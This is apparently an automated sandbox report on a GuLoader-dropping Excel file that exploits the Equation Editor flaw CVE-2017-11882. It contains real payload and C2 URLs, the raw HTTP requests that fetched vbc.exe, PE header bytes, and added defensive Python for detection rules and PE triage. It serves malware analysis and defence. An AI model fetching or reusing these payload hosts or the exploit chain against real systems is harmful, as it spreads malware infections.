Windows Analysis Report ORDER RFQ1009202.xlsx

Overview

General Information

Sample Name: ORDER RFQ1009202.xlsx
Analysis ID: 483003
MD5: f60722f1276c17d3730a51d325e38e4f
SHA1: db5bff43471b8729d3da739d85d156f586fd4ece
SHA256: 065e796cb07c1408bca1859b5ca5fae93d8bd6d145e0a547b9916f226c6d7fa8
Tags: Loki, VelvetSweatshop, xlsx

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
GuLoader behavior detected
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Hides threads from debuggers
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Found malware configuration
Source: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=downloa"}
Multi AV Scanner detection for submitted file
Source: ORDER RFQ1009202.xlsx Virustotal: Detection: 35%
Source: ORDER RFQ1009202.xlsx ReversingLabs: Detection: 27%
Antivirus detection for URL or domain
Source: http://23.95.85.181/msn/vbc.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://23.95.85.181/msn/vbc.exe Virustotal: Detection: 6%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Virustotal: Detection: 51%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe ReversingLabs: Detection: 27%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 27%
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown HTTPS traffic detected: 151.101.65.195:443 -> 192.168.2.22:49165 version: TLS 1.2
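
The chain the report records here (EQNEDT32.EXE started out of process with -Embedding, writing vbc.exe to a user-writable folder, launching it, and talking to the internet) is exactly what the Sigma-style signatures at the top of the report key on. The following is an added example, not part of the Joe Sandbox report: three detection rules in that style, run over Sysmon-shaped events. The field names (EventID, Image, ParentImage, TargetFilename, DestinationIp) follow Sysmon's schema, but every event record below is constructed here to mirror the report's process tree and traffic, not taken from a real log.

```python
"""Detection rules for the Equation Editor exploitation chain (added example)."""
from dataclasses import dataclass
from typing import Callable, Dict, List

EQNEDT = "\\eqnedt32.exe"
PE_EXTENSIONS = (".exe", ".dll", ".scr", ".com")
# User-writable folders that an Office component has no business launching from.
SUSPICIOUS_DIRS = ("\\users\\public\\", "\\appdata\\local\\temp\\", "\\programdata\\")


@dataclass(frozen=True)
class Alert:
    rule: str
    event_id: int
    detail: str


def _norm(path: str) -> str:
    """Case-fold and normalise separators so endswith/contains checks are stable."""
    return path.replace("/", "\\").lower()


def _is_eqnedt(path: str) -> bool:
    return _norm(path).endswith(EQNEDT)


def rule_eqnedt_spawns_process(ev: Dict) -> List[Alert]:
    """Sysmon EID 1: EQNEDT32.EXE never has a legitimate child process.

    A child launched from a user-writable folder is the dropper pattern seen with
    CVE-2017-11882 / CVE-2018-0802 shellcode (write payload, then run it).
    """
    if ev.get("EventID") != 1 or not _is_eqnedt(ev.get("ParentImage", "")):
        return []
    image = _norm(ev.get("Image", ""))
    level = "critical" if any(d in image for d in SUSPICIOUS_DIRS) else "high"
    return [Alert("Droppers Exploiting CVE-2017-11882", 1, f"{level}: child {ev.get('Image')}")]


def rule_eqnedt_drops_pe(ev: Dict) -> List[Alert]:
    """Sysmon EID 11: EQNEDT32.EXE writing a file with an executable extension."""
    if ev.get("EventID") != 11 or not _is_eqnedt(ev.get("Image", "")):
        return []
    if not _norm(ev.get("TargetFilename", "")).endswith(PE_EXTENSIONS):
        return []
    return [Alert("File Dropped By EQNEDT32EXE", 11, f"wrote {ev.get('TargetFilename')}")]


def rule_eqnedt_network(ev: Dict) -> List[Alert]:
    """Sysmon EID 3: the Equation Editor has no reason to open network connections."""
    if ev.get("EventID") != 3 or not _is_eqnedt(ev.get("Image", "")):
        return []
    return [Alert("EQNEDT32.EXE connecting to internet", 3,
                  f"to {ev.get('DestinationIp')}:{ev.get('DestinationPort')}")]


RULES: List[Callable[[Dict], List[Alert]]] = [
    rule_eqnedt_spawns_process, rule_eqnedt_drops_pe, rule_eqnedt_network,
]


def run_rules(events: List[Dict]) -> List[Alert]:
    """Apply every rule to every event; alert order follows event order."""
    alerts: List[Alert] = []
    for ev in events:
        for rule in RULES:
            alerts.extend(rule(ev))
    return alerts


EQNEDT_PATH = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
EXCEL_PATH = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"

# Constructed events modelled on the process tree and traffic in the report above.
SAMPLE_EVENTS: List[Dict] = [
    {"EventID": 1, "Image": EXCEL_PATH, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f'"{EXCEL_PATH}" /automation -Embedding'},
    # The Equation Editor is an out-of-process COM server started by the DCOM launcher
    # (svchost.exe), not by Excel, which is why the report shows its parent as "unknown"
    # and why these rules key on EQNEDT32.EXE itself rather than on an Office parent.
    {"EventID": 1, "Image": EQNEDT_PATH, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": f'"{EQNEDT_PATH}" -Embedding'},
    {"EventID": 3, "Image": EQNEDT_PATH, "DestinationIp": "23.95.85.181", "DestinationPort": 80},
    {"EventID": 11, "Image": EQNEDT_PATH, "TargetFilename":
     r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe"},
    {"EventID": 11, "Image": EQNEDT_PATH, "TargetFilename": r"C:\Users\Public\vbc.exe"},
    {"EventID": 1, "Image": r"C:\Users\Public\vbc.exe", "ParentImage": EQNEDT_PATH,
     "CommandLine": r"C:\Users\Public\vbc.exe"},
    # The loader re-launches itself; none of the three rules above fire on that step.
    {"EventID": 1, "Image": r"C:\Users\Public\vbc.exe", "ParentImage": r"C:\Users\Public\vbc.exe",
     "CommandLine": r"C:\Users\Public\vbc.exe"},
]

if __name__ == "__main__":
    for a in run_rules(SAMPLE_EVENTS):
        print(f"[{a.rule}] EID {a.event_id}: {a.detail}")
```

Four of the seven constructed events fire (the connection to 23.95.85.181, the two PE drops and the child process in C:\Users\Public); the Excel launch, the Equation Editor's own start and the loader's self-spawn do not. The last of these is worth a separate rule in production (a process in a user-writable folder spawning a copy of itself is the suspended-mode injection pattern the report flags further down), but it is outside what the three Sigma titles describe.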

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: ggle.io
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 151.101.65.195:443
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 151.101.65.195:443
Source: excel.exe Memory has grown: Private usage: 4MB later: 69MB

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=downloa
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 151.101.65.195
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected:
HTTP/1.1 200 OK
Date: Tue, 14 Sep 2021 17:17:17 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
Last-Modified: Tue, 14 Sep 2021 02:46:53 GMT
ETag: "12000-5cbeb98214636"
Accept-Ranges: bytes
Content-Length: 73728
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e0 86 d4 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 f0 00 00 00 30 00 00 00 00 00 00 5c 13 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 01 00 00 10 00 00 01 ee 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 ee 00 00 28 00 00 00 00 20 01 00 f5 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 18 e3 00 00 00 10 00 00 00 f0 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c4 11 00 00 00 00 01 00 00 10 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f5 09 00 00 00 20 01 00 00 10 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
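
The response above is the payload fetch: Content-Type application/x-msdownload, Content-Length 73728, and a body that opens with MZ. What follows is an added example, not part of the Joe Sandbox report: a small header reader that confirms the body is a PE and pulls out the facts a responder wants before anything is detonated (PE32 or PE32+, machine, entry point, section layout, data directories, bound imports, and whether the declared length leaves room for an overlay). SAMPLE_BODY is reconstructed from the Data Raw bytes printed above (DOS header, stub, Rich header, COFF and optional headers, section table and the bound-import table that follows them); the long zero runs, which are hard to count in the rendered dump, are laid out per the PE format rather than copied token by token, and SAMPLE_HEADERS repeats the response headers as printed.

```python
"""PE header triage for a captured executable download (added example)."""
import struct
from typing import Dict, List

DIRECTORY_NAMES = ("export", "import", "resource", "exception", "security", "basereloc",
                   "debug", "architecture", "globalptr", "tls", "loadconfig", "boundimport",
                   "iat", "delayimport", "clr", "reserved")


def _hx(s: str) -> bytes:
    return bytes.fromhex(s)


# Reconstructed from the Data Raw bytes in the report; zero runs laid out per the PE format.
SAMPLE_BODY = b"".join([
    _hx("4d5a90000300000004000000ffff0000b8000000000000004000000000000000"),  # IMAGE_DOS_HEADER
    bytes(28), _hx("b8000000"),                                                  # ... e_lfanew = 0xb8
    _hx("0e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f"),  # DOS stub
    _hx("742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000"),
    _hx("8b23c4dbcf42aa88cf42aa88cf42aa884c5ea488ce42aa888060a388cd42aa88"),  # Rich header (XOR-masked)
    _hx("f964a788ce42aa8852696368cf42aa88"), bytes(8),
    _hx("504500004c010300e086d4480000000000000000e0000f01"),                  # PE\0\0 + IMAGE_FILE_HEADER
    _hx("0b01060000f000000030000000000000"),  # IMAGE_OPTIONAL_HEADER32: magic 0x10b, linker 6.0, code/data sizes
    _hx("5c130000001000000000010000004000"),  # EntryPoint 0x135c, BaseOfCode, BaseOfData, ImageBase 0x400000
    _hx("00100000001000000400000001000000"),  # section/file alignment 0x1000, OS 4.0, image 1.0
    _hx("04000000000000000030010000100000"),  # subsystem 4.0, Win32VersionValue, SizeOfImage, SizeOfHeaders
    _hx("01ee0100020000000000100000100000"),  # CheckSum, Subsystem=2 (GUI), DllCharacteristics=0, stack sizes
    _hx("00001000001000000000000010000000"),  # heap sizes, LoaderFlags, NumberOfRvaAndSizes=16
    bytes(8), _hx("34ee000028000000"), _hx("00200100f5090000"), bytes(64),  # dirs 0-10: import, resource
    _hx("2802000020000000"), _hx("001000002c010000"), bytes(24),             # dirs 11-15: bound import, IAT
    _hx("2e74657874000000" "18e30000" "00100000" "00f00000" "00100000"), bytes(12), _hx("20000060"),  # .text
    _hx("2e64617461000000" "c4110000" "00000100" "00100000" "00000100"), bytes(12), _hx("400000c0"),  # .data
    _hx("2e72737263000000" "f5090000" "00200100" "00100000" "00100100"), bytes(12), _hx("40000040"),  # .rsrc
    _hx("c31fb04910000000"), bytes(8), b"MSVBVM60.DLL\0",  # IMAGE_BOUND_IMPORT_DESCRIPTOR, terminator, name
])

# Response headers as printed in the report.
SAMPLE_HEADERS = {"Server": "Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23",
                  "Content-Length": "73728", "Content-Type": "application/x-msdownload"}


def parse_pe_headers(data: bytes) -> Dict:
    """Parse DOS/COFF/optional headers and the section table; header area only, so a
    truncated capture is enough. Raises ValueError on anything that is not a PE."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ magic")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    machine, nsections, timestamp, _, _, opt_size, characteristics = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    magic, linker_major, linker_minor = struct.unpack_from("<HBB", data, opt)
    pe32plus = magic == 0x20B
    (entry_point,) = struct.unpack_from("<I", data, opt + 16)
    if pe32plus:  # ImageBase is 8 bytes and the directory table shifts by 16
        (image_base,) = struct.unpack_from("<Q", data, opt + 24)
        ndirs_off, dirs_off = 108, 112
    else:
        (image_base,) = struct.unpack_from("<I", data, opt + 28)
        ndirs_off, dirs_off = 92, 96
    (subsystem,) = struct.unpack_from("<H", data, opt + 68)
    (ndirs,) = struct.unpack_from("<I", data, opt + ndirs_off)
    directories = {}
    for i in range(min(ndirs, 16)):
        rva, size = struct.unpack_from("<II", data, opt + dirs_off + 8 * i)
        if rva or size:
            directories[DIRECTORY_NAMES[i]] = (rva, size)
    sections = []
    table = opt + opt_size
    for i in range(nsections):
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", data, table + 40 * i)
        (flags,) = struct.unpack_from("<I", data, table + 40 * i + 36)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "vaddr": vaddr,
                         "vsize": vsize, "rawptr": rawptr, "rawsize": rawsize, "flags": flags})
    return {"machine": machine, "pe32plus": pe32plus, "timestamp": timestamp,
            "characteristics": characteristics, "linker": (linker_major, linker_minor),
            "entry_point": entry_point, "image_base": image_base, "subsystem": subsystem,
            "directories": directories, "sections": sections}


def bound_imports(data: bytes, info: Dict) -> List[str]:
    """Walk IMAGE_BOUND_IMPORT_DESCRIPTOR entries. They sit inside the header area,
    where RVA equals file offset, so no section mapping is needed."""
    if "boundimport" not in info["directories"]:
        return []
    base, _ = info["directories"]["boundimport"]
    names, off = [], base
    while True:
        stamp, name_off, nfwd = struct.unpack_from("<IHH", data, off)
        if stamp == 0 and name_off == 0:
            return names
        names.append(data[base + name_off:data.index(b"\0", base + name_off)].decode("ascii", "replace"))
        off += 8 * (1 + nfwd)  # forwarder refs follow the descriptor they belong to


def triage_download(headers: Dict[str, str], body: bytes) -> Dict:
    """Join the HTTP-level facts with the PE-level ones a responder checks first."""
    info = parse_pe_headers(body)
    info["content_type_claims_exe"] = headers.get("Content-Type", "").lower() == "application/x-msdownload"
    info["bound_imports"] = bound_imports(body, info)
    info["vb6_runtime"] = any(n.upper() == "MSVBVM60.DLL" for n in info["bound_imports"])
    # Bytes the section table accounts for; anything beyond is an overlay (config, second stage).
    mapped = max(s["rawptr"] + s["rawsize"] for s in info["sections"])
    info["overlay_bytes"] = int(headers.get("Content-Length", "0")) - mapped
    return info


if __name__ == "__main__":
    r = triage_download(SAMPLE_HEADERS, SAMPLE_BODY)
    print(f"PE32+={r['pe32plus']} machine=0x{r['machine']:x} EP=0x{r['image_base'] + r['entry_point']:08x}")
    print([s["name"] for s in r["sections"]], r["bound_imports"], "overlay:", r["overlay_bytes"])
```

On the reconstructed bytes this yields a PE32 i386 GUI image whose entry point, 0x400000 + 0x135C = 0x0040135C, is the first address in the report's "Detected potential crypto function" list; whose three sections end exactly at 0x12000 = 73728 bytes, so Content-Length leaves no overlay; and whose only bound import is MSVBVM60.DLL, the VB6 runtime the report later shows vbc.exe loading from SysWOW64. The COFF timestamp (0x48D486E0, a September 2008 build stamp) sits thirteen years before the server's Last-Modified header, a reminder that compile timestamps are attacker-controlled and only a weak signal. Only the header area is read, so the same reader works on the truncated capture Joe Sandbox prints.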
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
GET /4GZv HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ggle.io
Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
GET /msn/vbc.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Connection: Keep-Alive
Host: 23.95.85.181
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.85.181 (reported 32 times)
Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: vbc.exe, 00000006.00000002.620050583.00000000033B7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.620050583.00000000033B7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000002.620050583.00000000033B7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000006.00000002.620050583.00000000033B7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: 91D8F771.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: vbc.exe, 00000006.00000002.620050583.00000000033B7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91D8F771.emf
Source: unknown DNS traffic detected: queries for: ggle.io

System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040135C 6_2_0040135C
Source: C:\Users\Public\vbc.exe Code function: 6_2_023506C1 6_2_023506C1
Source: C:\Users\Public\vbc.exe Code function: 6_2_02354559 6_2_02354559
Source: C:\Users\Public\vbc.exe Code function: 6_2_023599A3 6_2_023599A3
Source: C:\Users\Public\vbc.exe Code function: 6_2_02355B9A 6_2_02355B9A
Source: C:\Users\Public\vbc.exe Code function: 6_2_02350DC2 6_2_02350DC2
Source: C:\Users\Public\vbc.exe Code function: 6_2_02359A38 6_2_02359A38
Source: C:\Users\Public\vbc.exe Code function: 6_2_02354C22 6_2_02354C22
Source: C:\Users\Public\vbc.exe Code function: 6_2_02352615 6_2_02352615
Source: C:\Users\Public\vbc.exe Code function: 6_2_02352009 6_2_02352009
Source: C:\Users\Public\vbc.exe Code function: 6_2_0235027E 6_2_0235027E
Source: C:\Users\Public\vbc.exe Code function: 6_2_0235607E 6_2_0235607E
Source: C:\Users\Public\vbc.exe Code function: 6_2_0235747B 6_2_0235747B
Source: C:\Users\Public\vbc.exe Code function: 6_2_02354268 6_2_02354268
Source: C:\Users\Public\vbc.exe Code function: 6_2_0235286A 6_2_0235286A
Source: C:\Users\Public\vbc.exe Code function: 6_2_0235506A 6_2_0235506A
Source: C:\Users\Public\vbc.exe Code function: 6_2_02351046 6_2_02351046
Source: C:\Users\Public\vbc.exe Code function: 6_2_02357C4D 6_2_02357C4D
Source: C:\Users\Public\vbc.exe Code function: 6_2_0235464E 6_2_0235464E
Source: C:\Users\Public\vbc.exe Code function: 6_2_02358CB4 6_2_02358CB4
Source: C:\Users\Public\vbc.exe Code function: 6_2_02352ABC 6_2_02352ABC
Source: C:\Users\Public\vbc.exe Code function: 6_2_02353AB9 6_2_02353AB9
Source: C:\Users\Public\vbc.exe Code function: 6_2_023532AD 6_2_023532AD
Source: C:\Users\Public\vbc.exe Code function: 6_2_02354AAC 6_2_02354AAC
Source: C:\Users\Public\vbc.exe Code function: 6_2_02359A9F 6_2_02359A9F
Source: C:\Users\Public\vbc.exe Code function: 6_2_02358A83 6_2_02358A83
Source: C:\Users\Public\vbc.exe Code function: 6_2_02351482 6_2_02351482
Source: C:\Users\Public\vbc.exe Code function: 6_2_02354EF8 6_2_02354EF8
Source: C:\Users\Public\vbc.exe Code function: 6_2_023582E1 6_2_023582E1
Source: C:\Users\Public\vbc.exe Code function: 6_2_023550E1 6_2_023550E1
Source: C:\Users\Public\vbc.exe Code function: 6_2_023544E2 6_2_023544E2
Source: C:\Users\Public\vbc.exe Code function: 6_2_023512DC 6_2_023512DC
Source: C:\Users\Public\vbc.exe Code function: 6_2_023532C0 6_2_023532C0
Source: C:\Users\Public\vbc.exe Code function: 6_2_023504CB 6_2_023504CB
Source: C:\Users\Public\vbc.exe Code function: 6_2_023558CA 6_2_023558CA
Source: C:\Users\Public\vbc.exe Code function: 6_2_02352F36 6_2_02352F36
Source: C:\Users\Public\vbc.exe Code function: 6_2_02354932 6_2_02354932
Source: C:\Users\Public\vbc.exe Code function: 6_2_02359127 6_2_02359127
Source: C:\Users\Public\vbc.exe Code function: 6_2_02351328 6_2_02351328
Source: C:\Users\Public\vbc.exe Code function: 6_2_0235312B 6_2_0235312B
Source: C:\Users\Public\vbc.exe Code function: 6_2_0235331E 6_2_0235331E
Source: C:\Users\Public\vbc.exe Code function: 6_2_02354106 6_2_02354106
Source: C:\Users\Public\vbc.exe Code function: 6_2_02352D00 6_2_02352D00
Source: C:\Users\Public\vbc.exe Code function: 6_2_02358B0B 6_2_02358B0B
Source: C:\Users\Public\vbc.exe Code function: 6_2_02350F0A 6_2_02350F0A
Source: C:\Users\Public\vbc.exe Code function: 6_2_02358376 6_2_02358376
Source: C:\Users\Public\vbc.exe Code function: 6_2_02353172 6_2_02353172
Source: C:\Users\Public\vbc.exe Code function: 6_2_02357978 6_2_02357978
Source: C:\Users\Public\vbc.exe Code function: 6_2_02353B67 6_2_02353B67
Source: C:\Users\Public\vbc.exe Code function: 6_2_02350D57 6_2_02350D57
Source: C:\Users\Public\vbc.exe Code function: 6_2_02357B4F 6_2_02357B4F
Source: C:\Users\Public\vbc.exe Code function: 6_2_023511B6 6_2_023511B6
Source: C:\Users\Public\vbc.exe Code function: 6_2_02355FB1 6_2_02355FB1
Source: C:\Users\Public\vbc.exe Code function: 6_2_02351FBE 6_2_02351FBE
Source: C:\Users\Public\vbc.exe Code function: 6_2_023547BA 6_2_023547BA
Source: C:\Users\Public\vbc.exe Code function: 6_2_02352FAC 6_2_02352FAC
Source: C:\Users\Public\vbc.exe Code function: 6_2_02352B94 6_2_02352B94
Source: C:\Users\Public\vbc.exe Code function: 6_2_02353793 6_2_02353793
Source: C:\Users\Public\vbc.exe Code function: 6_2_02354D92 6_2_02354D92
Source: C:\Users\Public\vbc.exe Code function: 6_2_02358B86 6_2_02358B86
Source: C:\Users\Public\vbc.exe Code function: 6_2_02359B86 6_2_02359B86
Source: C:\Users\Public\vbc.exe Code function: 6_2_023599E0 6_2_023599E0
Source: C:\Users\Public\vbc.exe Code function: 6_2_023583E3 6_2_023583E3
Source: C:\Users\Public\vbc.exe Code function: 6_2_023507ED 6_2_023507ED
Source: C:\Users\Public\vbc.exe Code function: 6_2_023591EF 6_2_023591EF
Source: C:\Users\Public\vbc.exe Code function: 6_2_02358DEA 6_2_02358DEA
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B5B9A 9_2_001B5B9A
